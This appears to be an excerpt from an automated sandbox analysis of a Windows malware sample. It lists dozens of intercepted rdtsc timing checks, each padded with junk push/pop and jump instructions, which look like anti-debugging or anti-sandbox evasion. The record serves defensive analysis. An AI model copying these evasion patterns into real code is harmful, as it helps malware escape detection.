Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE109C second address: DE10A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE1205 second address: DE1228 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007FC734882085h 0x0000000e jmp 00007FC73488207Fh 0x00000013 push eax 0x00000014 push edx 0x00000015 push edi 0x00000016 pop edi 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE13A8 second address: DE13D5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FC734E5F776h 0x00000008 jbe 00007FC734E5F776h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007FC734E5F788h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE1569 second address: DE1579 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jnp 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE1579 second address: DE1585 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE54CD second address: DE54DD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FC734882076h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE54DD second address: DE54F1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC734E5F776h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007FC734E5F776h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE57E9 second address: DE57EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE5AA8 second address: DE5AAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DE5AAC second address: DE5AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC734882076h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d je 00007FC734882076h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEA1B1 second address: DEA1C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FC734E5F782h 0x0000000c ja 00007FC734E5F776h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEA98B second address: DEA99E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC73488207Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEA99E second address: DEA9B9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F784h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEAAE9 second address: DEAAF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FC734882076h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEF338 second address: DEF33F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEEA63 second address: DEEA79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882080h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEEA79 second address: DEEA7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DEED6D second address: DEED71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF55E5 second address: DF55E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF58BC second address: DF58D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734882082h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF58D2 second address: DF58DA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF58DA second address: DF58F5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FC734882081h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF5E30 second address: DF5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FC734E5F782h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF668F second address: DF6693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF6693 second address: DF66AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FC734E5F77Ch 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF66AC second address: DF66B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF66B0 second address: DF66E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Dh 0x00000007 jmp 00007FC734E5F788h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnc 00007FC734E5F77Ah 0x00000014 push edx 0x00000015 pop edx 0x00000016 push esi 0x00000017 pop esi 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF66E3 second address: DF66EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF66EA second address: DF66F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF66F0 second address: DF66F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF69B6 second address: DF69C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F77Bh 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF69C7 second address: DF69CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF6CFA second address: DF6D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Ah 0x00000009 jmp 00007FC734E5F77Fh 0x0000000e jl 00007FC734E5F77Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DF6D1F second address: DF6D2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 js 00007FC73488208Ch 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFF3AA second address: DFF3AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFF3AE second address: DFF3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFF3B8 second address: DFF3BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFF3BC second address: DFF3D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Ah 0x00000007 jbe 00007FC734882076h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFE837 second address: DFE866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a jno 00007FC734E5F776h 0x00000010 pop ecx 0x00000011 jmp 00007FC734E5F782h 0x00000016 popad 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007FC734E5F776h 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFE9AD second address: DFEA0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FC734882076h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b jmp 00007FC734882085h 0x00000010 popad 0x00000011 jmp 00007FC734882088h 0x00000016 pop edx 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FC734882081h 0x0000001e jnc 00007FC73488207Eh 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFEA0C second address: DFEA10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFEB3F second address: DFEB43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFEB43 second address: DFEB4B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFEB4B second address: DFEB63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882082h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFEB63 second address: DFEB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFECB1 second address: DFECB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFECB7 second address: DFECC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FC734E5F782h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFECC5 second address: DFECCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFECCB second address: DFECCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFECCF second address: DFECE5 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FC73488207Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FC734882076h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFECE5 second address: DFECE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFEE3E second address: DFEE42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DFF0F9 second address: DFF0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E07C99 second address: E07C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E08426 second address: E0842E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E0842E second address: E08432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E085A0 second address: E085BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F788h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E085BE second address: E085C3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E08742 second address: E08748 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E08748 second address: E0874E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E103B2 second address: E103D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC734E5F77Dh 0x0000000c jmp 00007FC734E5F77Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E103D0 second address: E103EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882088h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E10687 second address: E10694 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E10694 second address: E10698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E10698 second address: E1069C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E27D8F second address: E27DA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FC734882076h 0x00000011 jl 00007FC734882076h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E27DA6 second address: E27DAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E27DAA second address: E27DBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC73488207Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E27DBB second address: E27DCE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC734E5F77Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E2F5D0 second address: E2F5D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E2F5D6 second address: E2F5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FC734E5F77Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E3687D second address: E3689E instructions: 0x00000000 rdtsc 0x00000002 js 00007FC734882076h 0x00000008 jmp 00007FC734882087h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E36A09 second address: E36A0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E36A0D second address: E36A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E36BB2 second address: E36BB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E36BB6 second address: E36BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC734882085h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E36BD1 second address: E36BD7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E36BD7 second address: E36BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E3702A second address: E37051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jmp 00007FC734E5F781h 0x0000000d push eax 0x0000000e jmp 00007FC734E5F77Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E371A2 second address: E371C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC734882076h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f pop eax 0x00000010 pushad 0x00000011 popad 0x00000012 push esi 0x00000013 pop esi 0x00000014 jmp 00007FC73488207Dh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E37341 second address: E37349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E37DC7 second address: E37DE5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FC734882076h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC73488207Bh 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E37DE5 second address: E37DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E3BAA5 second address: E3BAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC73488207Eh 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E3BAB8 second address: E3BAD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F787h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E48371 second address: E48375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E48375 second address: E48383 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E48383 second address: E48387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: E48387 second address: E4838B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
